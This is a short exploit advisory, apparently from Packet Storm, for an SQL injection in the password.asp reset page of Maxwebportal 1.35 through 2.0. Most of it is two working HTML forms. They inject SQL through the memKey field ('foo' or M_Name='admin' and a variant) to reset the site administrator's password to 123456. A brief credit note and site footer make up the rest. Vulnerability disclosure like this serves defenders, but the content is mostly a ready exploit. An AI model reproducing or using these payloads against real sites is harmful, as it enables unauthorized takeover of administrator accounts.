Maxwebportal versions 1.36 and below password.asp Change Password exploit using html.
29f4738fff7472ff35b35c2baa49847ee4cf987ac9c08063e2a24a30660830fd<!--
Hi, I'm Soroush Dalili from Grayhatz Security Group (GSG) . I found dangerous sql injection
in Maxwebportal version 1.35,1.36,2.0, 20050418 Next
Remote user can inject his/her code in "memKey" var. and change other users password in
password.asp
Exploit codes to proof:
-->
-----------------Code Start-----Version 1.35 and older--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
Version 1.36, 2.0, 20050418 Next:
-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2"
size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed